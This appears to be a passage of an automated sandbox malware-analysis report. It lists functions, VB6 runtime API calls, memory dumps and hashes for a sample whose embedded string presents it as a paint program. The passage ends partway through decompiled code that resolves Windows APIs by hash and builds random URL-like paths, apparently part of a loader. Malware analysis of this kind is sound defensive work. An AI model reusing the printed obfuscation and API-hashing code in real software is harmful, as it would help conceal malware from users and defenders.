0x00457fde
0x00457fe0
0x00457fe5
0x00457fe8
0x00457fee
0x00457ff1
0x00457ff6
0x00457ff8
0x00458003
0x00458003
0x00458009
0x0045800c
0x00458013
0x0045801a
0x0045801d
0x00458025
0x0045802a
0x0045802c
0x00458037
0x00458037
0x0045804b
0x00458054
0x00458054
0x00458059
0x00458060
0x00000000

APIs

__vbaNew2.MSVBVM60(004095DC,0046C7C0), ref: 00457F07
__vbaHresultCheckObj.MSVBVM60(00000000,029E254C,004095CC,0000001C), ref: 00457F32
__vbaHresultCheckObj.MSVBVM60(00000000,?,00409AD4,00000064), ref: 00457F5C
__vbaFreeObj.MSVBVM60 ref: 00457F65
__vbaObjSet.MSVBVM60(?,00000000), ref: 00457F82
__vbaNew2.MSVBVM60(004095DC,0046C7C0), ref: 00457F9E
__vbaHresultCheckObj.MSVBVM60(00000000,029E254C,004095CC,0000001C), ref: 00457FC3
__vbaHresultCheckObj.MSVBVM60(00000000,?,00409AD4,00000054), ref: 00458003
__vbaObjSet.MSVBVM60(?,?), ref: 0045801D
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040937C,00000064), ref: 00458037
__vbaFreeObjList.MSVBVM60(00000003,?,?,?), ref: 0045804B

Memory Dump Source

Source File: 00000000.00000002.660946211.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.660941226.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.661050174.0000000000460000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.661056537.0000000000461000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.661067161.000000000046C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661073801.000000000046E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661079197.0000000000470000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.661088372.0000000000484000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_boI88C399w.jbxd

Similarity

API ID: __vba$CheckHresult$FreeNew2$List
String ID:
API String ID: 3473554973-0
Opcode ID: a85082a3fff54711ec9e8c903a12be6ba262f6fb5f4eb4185097042646250b61
Instruction ID: b42dbe6fcfa4de6740d81c7fa15dcc3f0c6fbc690549f91005cdecd08bc8f610
Opcode Fuzzy Hash: a85082a3fff54711ec9e8c903a12be6ba262f6fb5f4eb4185097042646250b61
Instruction Fuzzy Hash: 285150B1A00209AFDB10DF65CD85AAEBBB8FF48745F10402AF945B72A1D7789905CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 0046A050, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 130COMMON

Download Yara Rule

APIs

__vbaStrCopy.MSVBVM60 ref: 0046A09F
__vbaNew2.MSVBVM60(00402848,0046C17C), ref: 0046A0B8
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,004098D8,00000108), ref: 0046A0E9
__vbaFpI4.MSVBVM60 ref: 0046A102
__vbaNew2.MSVBVM60(00402848,0046C17C), ref: 0046A130
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,004098D8,00000100), ref: 0046A15B
__vbaHresultCheckObj.MSVBVM60(00000000,00401E38,004098D8,000002C8,?,00000000), ref: 0046A1AC

Strings

!SEK - Paint 2.0, Made by Stephan Kirchmaier in Y2K! Vote FOR it, please!! THANX! , xrefs: 0046A090

Memory Dump Source

Source File: 00000000.00000002.661056537.0000000000461000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.660941226.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.660946211.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.661050174.0000000000460000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.661067161.000000000046C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661073801.000000000046E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661079197.0000000000470000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.661088372.0000000000484000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_boI88C399w.jbxd

Similarity

API ID: __vba$CheckHresult$New2$Copy
String ID: !SEK - Paint 2.0, Made by Stephan Kirchmaier in Y2K! Vote FOR it, please!! THANX!
API String ID: 4276202801-3111897467
Opcode ID: ecaba2f5e322754d220e3dc59d64c04075944052a6391f984978fcdc96757805
Instruction ID: e37d013b0a7967170e8264c87dea3795a423a5d4b7d28face1133d6eb6a434b2
Opcode Fuzzy Hash: ecaba2f5e322754d220e3dc59d64c04075944052a6391f984978fcdc96757805
Instruction Fuzzy Hash: 5841A471A40204EBD700DF55DD89BEA7BB8FB4A700F10812AF545B72A0E7745851CFAA

Uniqueness

Uniqueness Score: -1.00%

Function 0046AFE0, Relevance: 13.6, APIs: 9, Instructions: 104COMMON

Download Yara Rule

APIs

__vbaObjSet.MSVBVM60(?,00000000), ref: 0046B059
__vbaStrI4.MSVBVM60(00000000), ref: 0046B08A
__vbaStrMove.MSVBVM60 ref: 0046B095
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00409314,000001EC), ref: 0046B0B7
__vbaFreeStr.MSVBVM60 ref: 0046B0C0
__vbaFreeObj.MSVBVM60 ref: 0046B0C9
__vbaObjSet.MSVBVM60(?,00000000), ref: 0046B0F1
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00409314,000000F4), ref: 0046B116
__vbaFreeObj.MSVBVM60 ref: 0046B11F

Memory Dump Source

Source File: 00000000.00000002.661056537.0000000000461000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.660941226.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.660946211.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.661050174.0000000000460000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.661067161.000000000046C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661073801.000000000046E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661079197.0000000000470000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.661088372.0000000000484000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_boI88C399w.jbxd

Similarity

API ID: __vba$Free$CheckHresult$Move
String ID:
API String ID: 1589273832-0
Opcode ID: 45f425e3fa6aa0382731a28c5b22ff2e9b023df185c102f8391d2e0cf4207cc8
Instruction ID: 14edfc58144b7436db7dd95e254d82ffd23b024d489fb720455d0158da249efa
Opcode Fuzzy Hash: 45f425e3fa6aa0382731a28c5b22ff2e9b023df185c102f8391d2e0cf4207cc8
Instruction Fuzzy Hash: BB416F70A00205EFC7009FA5D988AAEBBB8FF09700F10817AF505E72A1D7345885CF95

Uniqueness

Uniqueness Score: -1.00%

Function 004522B0, Relevance: 12.1, APIs: 8, Instructions: 119
COMMON

Download Yara Rule

C-Code - Quality: 26%

			E004522B0(void* __ebx, void* __edi, void* __esi, signed int _a4) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v28;
				char _v32;
				short _v36;
				short _v40;
				intOrPtr* _t38;
				void* _t39;
				intOrPtr* _t41;
				void* _t43;
				char* _t44;
				intOrPtr* _t46;
				intOrPtr* _t51;
				intOrPtr* _t70;
				intOrPtr* _t71;
				signed int _t74;
				signed int _t75;
				intOrPtr* _t76;
				void* _t77;
				void* _t79;
				intOrPtr _t80;

				_t80 = _t79 - 0xc;
				 *[fs:0x0] = _t80;
				_v16 = _t80 - 0x2c;
				_v12 = 0x4014b0;
				_t74 = _a4;
				_v8 = _t74 & 0x00000001;
				_t75 = _t74 & 0xfffffffe;
				_a4 = _t75;
				 *((intOrPtr*)( *_t75 + 4))(_t75, __edi, __esi, __ebx,  *[fs:0x0], 0x401e96, _t77);
				 *0x46c05c = 0x16;
				_v28 = 0;
				_v32 = 0;
				_v36 = 0;
				_v40 = 0;
				E00461350(0, __edi, _t75);
				_t38 =  &_v28;
				__imp____vbaObjSet(_t38,  *((intOrPtr*)( *_t75 + 0x304))(_t75));
				_t70 = _t38;
				_t39 =  *((intOrPtr*)( *_t70 + 0xf0))(_t70,  &_v36);
				asm("fclex");
				if(_t39 >= 0) {
					_t51 = __imp____vbaHresultCheckObj;
				} else {
					_t51 = __imp____vbaHresultCheckObj;
					 *_t51(_t39, _t70, 0x409314, 0xf0);
				}
				_t41 =  *((intOrPtr*)( *_t75 + 0x304))(_t75);
				__imp____vbaObjSet( &_v32, _t41);
				_t71 = _t41;
				_t43 =  *((intOrPtr*)( *_t71 + 0xf0))(_t71,  &_v40);
				asm("fclex");
				if(_t43 < 0) {
					 *_t51(_t43, _t71, 0x409314, 0xf0);
				}
				_t44 =  &_v32;
				__imp____vbaFreeObjList(2,  &_v28, _t44);
				if(( ~(0 | _v40 == 0x00000007) |  ~(0 | _v36 == 0x00000006)) != 0) {
					_t46 =  &_v28;
					__imp____vbaObjSet(_t46,  *((intOrPtr*)( *_t75 + 0x304))(_t75));
					_t76 = _t46;
					_t44 =  *((intOrPtr*)( *_t76 + 0xf4))(_t76, 0);
					asm("fclex");
					if(_t44 < 0) {
						_t44 =  *_t51(_t44, _t76, 0x409314, 0xf4);
					}
					__imp____vbaFreeObj();
				}
				_v8 = 0;
				_push(0x45241d);
				return _t44;
			}

0x004522b3
0x004522c2
0x004522cf
0x004522d2
0x004522d9
0x004522e1
0x004522e4
0x004522e8
0x004522ed
0x004522f2
0x004522fb
0x004522fe
0x00452301
0x00452304
0x00452307
0x00452316
0x0045231a
0x00452320
0x00452329
0x00452331
0x00452333
0x0045234b
0x00452335
0x00452335
0x00452347
0x00452347
0x00452354
0x0045235f
0x00452365
0x0045236e
0x00452376
0x00452378
0x00452386
0x00452386
0x0045238f
0x004523ae
0x004523ba
0x004523c6
0x004523ca
0x004523d0
0x004523d7
0x004523df
0x004523e1
0x004523ef
0x004523ef
0x004523f4
0x004523f4
0x004523fa
0x00452401
0x00000000

APIs

__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00401E96), ref: 0045231A
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00409314,000000F0), ref: 00452347
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00401E96), ref: 0045235F
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00409314,000000F0), ref: 00452386
__vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 004523AE
__vbaObjSet.MSVBVM60(?,00000000), ref: 004523CA
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00409314,000000F4), ref: 004523EF
__vbaFreeObj.MSVBVM60 ref: 004523F4

Memory Dump Source

Source File: 00000000.00000002.660946211.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.660941226.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.661050174.0000000000460000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.661056537.0000000000461000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.661067161.000000000046C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661073801.000000000046E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661079197.0000000000470000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.661088372.0000000000484000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_boI88C399w.jbxd

Similarity

API ID: __vba$CheckHresult$Free$List
String ID:
API String ID: 3690971433-0
Opcode ID: a8338418f50e535992760c63277d70d649cb9fe580441504e9a7cff8dd6e80c5
Instruction ID: d427d7d19d580ee48232a195fbf6afd293c5539e62ad48471b8656bbbb18eb9f
Opcode Fuzzy Hash: a8338418f50e535992760c63277d70d649cb9fe580441504e9a7cff8dd6e80c5
Instruction Fuzzy Hash: 93418371900205ABC710DFA5CD49BEFBBBCFF49704F10413AF946A71A1DB7859458BA8

Uniqueness

Uniqueness Score: -1.00%

Function 00452B00, Relevance: 12.1, APIs: 8, Instructions: 119
COMMON

Download Yara Rule

C-Code - Quality: 26%

			E00452B00(void* __ebx, void* __edi, void* __esi, signed int _a4) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v28;
				char _v32;
				short _v36;
				short _v40;
				intOrPtr* _t38;
				void* _t39;
				intOrPtr* _t41;
				void* _t43;
				char* _t44;
				intOrPtr* _t46;
				intOrPtr* _t51;
				intOrPtr* _t70;
				intOrPtr* _t71;
				signed int _t74;
				signed int _t75;
				intOrPtr* _t76;
				void* _t77;
				void* _t79;
				intOrPtr _t80;

				_t80 = _t79 - 0xc;
				 *[fs:0x0] = _t80;
				_v16 = _t80 - 0x2c;
				_v12 = 0x4014e8;
				_t74 = _a4;
				_v8 = _t74 & 0x00000001;
				_t75 = _t74 & 0xfffffffe;
				_a4 = _t75;
				 *((intOrPtr*)( *_t75 + 4))(_t75, __edi, __esi, __ebx,  *[fs:0x0], 0x401e96, _t77);
				 *0x46c05c = 0x17;
				_v28 = 0;
				_v32 = 0;
				_v36 = 0;
				_v40 = 0;
				E00461350(0, __edi, _t75);
				_t38 =  &_v28;
				__imp____vbaObjSet(_t38,  *((intOrPtr*)( *_t75 + 0x304))(_t75));
				_t70 = _t38;
				_t39 =  *((intOrPtr*)( *_t70 + 0xf0))(_t70,  &_v36);
				asm("fclex");
				if(_t39 >= 0) {
					_t51 = __imp____vbaHresultCheckObj;
				} else {
					_t51 = __imp____vbaHresultCheckObj;
					 *_t51(_t39, _t70, 0x409314, 0xf0);
				}
				_t41 =  *((intOrPtr*)( *_t75 + 0x304))(_t75);
				__imp____vbaObjSet( &_v32, _t41);
				_t71 = _t41;
				_t43 =  *((intOrPtr*)( *_t71 + 0xf0))(_t71,  &_v40);
				asm("fclex");
				if(_t43 < 0) {
					 *_t51(_t43, _t71, 0x409314, 0xf0);
				}
				_t44 =  &_v32;
				__imp____vbaFreeObjList(2,  &_v28, _t44);
				if(( ~(0 | _v40 == 0x00000007) |  ~(0 | _v36 == 0x00000006)) != 0) {
					_t46 =  &_v28;
					__imp____vbaObjSet(_t46,  *((intOrPtr*)( *_t75 + 0x304))(_t75));
					_t76 = _t46;
					_t44 =  *((intOrPtr*)( *_t76 + 0xf4))(_t76, 0);
					asm("fclex");
					if(_t44 < 0) {
						_t44 =  *_t51(_t44, _t76, 0x409314, 0xf4);
					}
					__imp____vbaFreeObj();
				}
				_v8 = 0;
				_push(0x452c6d);
				return _t44;
			}

0x00452b03
0x00452b12
0x00452b1f
0x00452b22
0x00452b29
0x00452b31
0x00452b34
0x00452b38
0x00452b3d
0x00452b42
0x00452b4b
0x00452b4e
0x00452b51
0x00452b54
0x00452b57
0x00452b66
0x00452b6a
0x00452b70
0x00452b79
0x00452b81
0x00452b83
0x00452b9b
0x00452b85
0x00452b85
0x00452b97
0x00452b97
0x00452ba4
0x00452baf
0x00452bb5
0x00452bbe
0x00452bc6
0x00452bc8
0x00452bd6
0x00452bd6
0x00452bdf
0x00452bfe
0x00452c0a
0x00452c16
0x00452c1a
0x00452c20
0x00452c27
0x00452c2f
0x00452c31
0x00452c3f
0x00452c3f
0x00452c44
0x00452c44
0x00452c4a
0x00452c51
0x00000000

APIs

__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00401E96), ref: 00452B6A
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00409314,000000F0), ref: 00452B97
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00401E96), ref: 00452BAF
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00409314,000000F0), ref: 00452BD6
__vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 00452BFE
__vbaObjSet.MSVBVM60(?,00000000), ref: 00452C1A
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00409314,000000F4), ref: 00452C3F
__vbaFreeObj.MSVBVM60 ref: 00452C44

Memory Dump Source

Source File: 00000000.00000002.660946211.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.660941226.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.661050174.0000000000460000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.661056537.0000000000461000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.661067161.000000000046C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661073801.000000000046E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661079197.0000000000470000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.661088372.0000000000484000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_boI88C399w.jbxd

Similarity

API ID: __vba$CheckHresult$Free$List
String ID:
API String ID: 3690971433-0
Opcode ID: 06bb0a9dc73e5d65a5a2568466e40fc16664bc13984e7bd1ba69befb73cb684d
Instruction ID: 500dfee885b1fe8388a55c1380d0e15fa1eb707ee1fcad8fe6003f7eb06a5eb7
Opcode Fuzzy Hash: 06bb0a9dc73e5d65a5a2568466e40fc16664bc13984e7bd1ba69befb73cb684d
Instruction Fuzzy Hash: 8A419371900205ABC710DFA4CD89BEFBBBCFF49705F10413AF946A71A2DB7859458BA8

Uniqueness

Uniqueness Score: -1.00%

Function 0044F160, Relevance: 12.1, APIs: 8, Instructions: 101COMMON

Download Yara Rule

APIs

__vbaObjSet.MSVBVM60(?,00000000), ref: 0044F1CD
__vbaLateIdCallLd.MSVBVM60(?,00000000), ref: 0044F1D4
__vbaCastObjVar.MSVBVM60(00000000), ref: 0044F1DE
__vbaObjSet.MSVBVM60(?,00000000), ref: 0044F1E9
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00409898,00000024), ref: 0044F218
__vbaHresultCheckObj.MSVBVM60(00000000,?,004098A8,00000080), ref: 0044F23F
__vbaFreeObjList.MSVBVM60(00000003,?,?,?), ref: 0044F253
__vbaFreeVarList.MSVBVM60(00000002,?,00000002), ref: 0044F263

Memory Dump Source

Source File: 00000000.00000002.660946211.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.660941226.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.661050174.0000000000460000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.661056537.0000000000461000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.661067161.000000000046C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661073801.000000000046E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661079197.0000000000470000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.661088372.0000000000484000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_boI88C399w.jbxd

Similarity

API ID: __vba$CheckFreeHresultList$CallCastLate
String ID:
API String ID: 881660153-0
Opcode ID: b797515f2a0cfd9e56daa0e8ca5480b2c9e088b0a108815c5391e7d6c94167eb
Instruction ID: 84401f26a8278aa19d540ab820f03e47ecdf4a6da3b39214274c6aeaaa62620b
Opcode Fuzzy Hash: b797515f2a0cfd9e56daa0e8ca5480b2c9e088b0a108815c5391e7d6c94167eb
Instruction Fuzzy Hash: 81316BB1900219AFDB00DF94CD49EEEBBBCFF88704F04816AF945B7291D7B859058BA4

Uniqueness

Uniqueness Score: -1.00%

Function 0045A3A0, Relevance: 12.1, APIs: 8, Instructions: 101COMMON

Download Yara Rule

APIs

__vbaObjSet.MSVBVM60(?,00000000), ref: 0045A40D
__vbaLateIdCallLd.MSVBVM60(?,00000000), ref: 0045A414
__vbaCastObjVar.MSVBVM60(00000000), ref: 0045A41E
__vbaObjSet.MSVBVM60(?,00000000), ref: 0045A429
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00409898,00000024), ref: 0045A458
__vbaHresultCheckObj.MSVBVM60(00000000,?,004098A8,00000080), ref: 0045A47F
__vbaFreeObjList.MSVBVM60(00000003,?,?,?), ref: 0045A493
__vbaFreeVarList.MSVBVM60(00000002,?,00000002), ref: 0045A4A3

Memory Dump Source

Source File: 00000000.00000002.660946211.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.660941226.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.661050174.0000000000460000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.661056537.0000000000461000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.661067161.000000000046C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661073801.000000000046E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661079197.0000000000470000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.661088372.0000000000484000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_boI88C399w.jbxd

Similarity

API ID: __vba$CheckFreeHresultList$CallCastLate
String ID:
API String ID: 881660153-0
Opcode ID: 740ae4643ae81fed70bc0dd701c6b069ebf7d9d805af9926f7e1d913d28a1c99
Instruction ID: 86f816b14cef4f7dff00650f53064d294107c9c4275d54bb0817c4802bdd8394
Opcode Fuzzy Hash: 740ae4643ae81fed70bc0dd701c6b069ebf7d9d805af9926f7e1d913d28a1c99
Instruction Fuzzy Hash: 89318DB1900219BFDB009F94CD49EEEBBBCFF89704F04812AF545B7291D7B859058BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00461600, Relevance: 12.1, APIs: 8, Instructions: 92COMMON

Download Yara Rule

APIs

__vbaNew2.MSVBVM60(00405960,0046C010,?,?,?,?,?,?,?,?,?,?,?,00000000,00401E96), ref: 0046164A
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00401E96), ref: 00461669
__vbaNew2.MSVBVM60(00405960,0046C010,?,?,?,?,?,?,?,?,?,?,?,00000000,00401E96), ref: 00461680
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00401E96), ref: 00461699
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,00000188,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004616BC
__vbaObjSet.MSVBVM60(?,?), ref: 004616D3
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,00000064), ref: 004616E9
__vbaFreeObjList.MSVBVM60(00000003,?,?,?), ref: 004616FD

Memory Dump Source

Source File: 00000000.00000002.661056537.0000000000461000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.660941226.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.660946211.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.661050174.0000000000460000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.661067161.000000000046C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661073801.000000000046E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661079197.0000000000470000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.661088372.0000000000484000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_boI88C399w.jbxd

Similarity

API ID: __vba$CheckHresultNew2$FreeList
String ID:
API String ID: 1549294082-0
Opcode ID: dfcd600a7c3c8b68abc073dc3bec911306bba0d88871887b91caef0796b682b4
Instruction ID: 2f3d86c0443dbf1e4a48e9dda0abc593aa6345c9e3e05c7208b25cf050ca04ff
Opcode Fuzzy Hash: dfcd600a7c3c8b68abc073dc3bec911306bba0d88871887b91caef0796b682b4
Instruction Fuzzy Hash: 9C316074900205EBCB109FA4CD89FAFB7BCFB08B44F14442AF541B72A0E67859058BA9

Uniqueness

Uniqueness Score: -1.00%

Function 02CC12B0, Relevance: 10.9, APIs: 1, Strings: 5, Instructions: 396
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E02CC12B0(char __ecx, signed int __edx, intOrPtr* _a4) {
				char _v2048;
				char _v2560;
				char _v2688;
				char _v2816;
				intOrPtr* _v2820;
				intOrPtr* _v2824;
				char _v2828;
				char _v2836;
				char _v2844;
				signed int _v2848;
				intOrPtr _v2852;
				void* _v2856;
				intOrPtr* _v2860;
				char _v2864;
				intOrPtr _v2868;
				char _v2872;
				intOrPtr* _v2876;
				signed int _v2880;
				signed int _v2884;
				signed int _v2888;
				char _v2892;
				intOrPtr* _v2896;
				intOrPtr _v2904;
				intOrPtr* _v2908;
				void* __ebx;
				void* __ebp;
				void* _t117;
				signed int _t118;
				void* _t121;
				intOrPtr* _t139;
				intOrPtr* _t141;
				signed int _t146;
				signed int _t154;
				intOrPtr* _t157;
				intOrPtr* _t159;
				signed int _t163;
				intOrPtr* _t174;
				signed int _t175;
				signed int _t178;
				intOrPtr* _t182;
				void* _t189;
				intOrPtr* _t191;
				intOrPtr* _t194;
				intOrPtr* _t196;
				char _t241;
				signed char* _t243;
				signed int _t263;
				short* _t265;
				void* _t266;
				short* _t267;
				void* _t268;
				void* _t269;
				intOrPtr _t270;
				signed int _t273;
				intOrPtr* _t274;
				void* _t276;
				void* _t277;
				intOrPtr* _t278;
				void* _t280;
				void* _t282;
				void* _t283;
				void* _t284;

				_t280 =  &_v2896;
				_t278 = _v2864;
				_t263 = __edx;
				_v2888 = 0;
				_t241 = __ecx;
				_v2884 = __edx;
				_t196 = _v2860;
				_t117 = 0xa52ba2c;
				_v2892 = __ecx;
				_v2896 = _t196;
				_v2876 = _t278;
				while(1) {
					L1:
					_t191 = _a4;
					goto L2;
					do {
						while(1) {
							L2:
							_t282 = _t117 - 0x1a712fee;
							if(_t282 > 0) {
								break;
							}
							if(_t282 == 0) {
								_t157 =  *0x2ccdea8;
								__eflags = _t157;
								if(_t157 == 0) {
									_t157 = E02CC3E80(_t191, E02CC3F20(0xbb398380), 0x97f883e, _t278);
									 *0x2ccdea8 = _t157;
								}
								_t268 =  *_t157();
								_t159 =  *0x2cce1a0;
								__eflags = _t159;
								if(_t159 == 0) {
									_t159 = E02CC3E80(_t191, E02CC3F20(0xbb398380), 0x26c3f343, _t278);
									 *0x2cce1a0 = _t159;
								}
								 *_t159(_t268, 0, _v2844);
								_t196 = _v2908;
								_t117 = 0xa9569d6;
								_t241 = _v2904;
								continue;
							} else {
								_t283 = _t117 - 0xa52ba2c;
								if(_t283 > 0) {
									__eflags = _t117 - 0x1194a5ec;
									if(__eflags > 0) {
										__eflags = _t117 - 0x1947423a;
										if(_t117 != 0x1947423a) {
											goto L28;
										} else {
											_t163 = E02CC1FB0( &_v2872,  &_v2856);
											_t196 = _v2896;
											_t241 = _v2892;
											asm("sbb eax, eax");
											_t117 = ( ~_t163 & 0xd3a4a493) + 0x2ec7d52f;
											continue;
										}
									} else {
										if(__eflags == 0) {
											_t265 =  &_v2560;
											_t194 = _v2880 - (0xaaaaaaab * _v2880 >> 0x20 >> 2) + (0xaaaaaaab * _v2880 >> 0x20 >> 2) * 2 + (0xaaaaaaab * _v2880 >> 0x20 >> 2) + (0xaaaaaaab * _v2880 >> 0x20 >> 2) * 2 + 1;
											__eflags = _t194;
											if(_t194 != 0) {
												do {
													_t273 = (_v2880 & 0x0000000f) + 4;
													E02CC4ED0(_t265, _t273,  &_v2880);
													_t267 = _t265 + _t273 * 2;
													_t280 = _t280 + 4;
													 *_t267 = 0x2f;
													_t265 = _t267 + 2;
													_t194 = _t194 - 1;
													__eflags = _t194;
												} while (_t194 != 0);
												_t278 = _v2876;
												_t196 = _v2896;
											}
											_t241 = _v2892;
											 *_t265 = 0;
											_t117 = 0x26613761;
											_t263 = _v2884;
											goto L1;
										} else {
											__eflags = _t117 - 0xa9569d6;
											if(_t117 == 0xa9569d6) {
												E02CC4250(_t191, _v2864);
												_t196 = _v2896;
												_t117 = 0xc5127ed;
												_t241 = _v2892;
												continue;
											} else {
												__eflags = _t117 - 0xc5127ed;
												if(_t117 == 0xc5127ed) {
													L69:
													E02CC4250(_t191, _t278);
													L70:
													return _v2888;
												} else {
													goto L28;
												}
											}
										}
									}
								} else {
									if(_t283 == 0) {
										_t174 =  *0x2ccdd4c;
										__eflags = _t174;
										if(_t174 == 0) {
											_t174 = E02CC3E80(_t191, E02CC3F20(0xbb398380), 0xae3c1a47, _t278);
											 *0x2ccdd4c = _t174;
										}
										_t175 =  *_t174();
										_t196 = _v2896;
										_t241 = _v2892;
										_v2880 = _t175;
										_t117 = 0x38f41d46;
										continue;
									} else {
										_t284 = _t117 - 0x3354cb2;
										if(_t284 > 0) {
											__eflags = _t117 - 0x8f8b881;
											if(_t117 != 0x8f8b881) {
												goto L28;
											} else {
												_t178 = E02CC1950( &_v2844,  &_v2688,  &_v2836);
												_t196 = _v2896;
												_t280 = _t280 + 4;
												_t241 = _v2892;
												asm("sbb eax, eax");
												_t117 = ( ~_t178 & 0x0c54f09a) + 0x1a712fee;
												continue;
											}
										} else {
											if(_t284 == 0) {
												_t269 = E02CC34C0(0x2ccd0e0);
												_t182 =  *0x2ccdc60;
												__eflags = _t182;
												if(_t182 == 0) {
													_t182 = E02CC3E80(_t191, E02CC3F20(0xe66945e6), 0xcca28b0d, _t278);
													 *0x2ccdc60 = _t182;
												}
												 *_t182( &_v2048, 0x400, _t269,  &_v2816,  &_v2688);
												_t280 = _t280 + 0x14;
												E02CC3460(_t269);
												_t196 = _v2896;
												_t117 = 0x8f8b881;
												_t241 = _v2892;
												continue;
											} else {
												if(_t117 == 0xe50069) {
													E02CC4250(_t191, _v2856);
													_t196 = _v2896;
													_t117 = 0x2ec7d52f;
													_t241 = _v2892;
													continue;
												} else {
													if(_t117 != 0x26c79c2) {
														goto L28;
													} else {
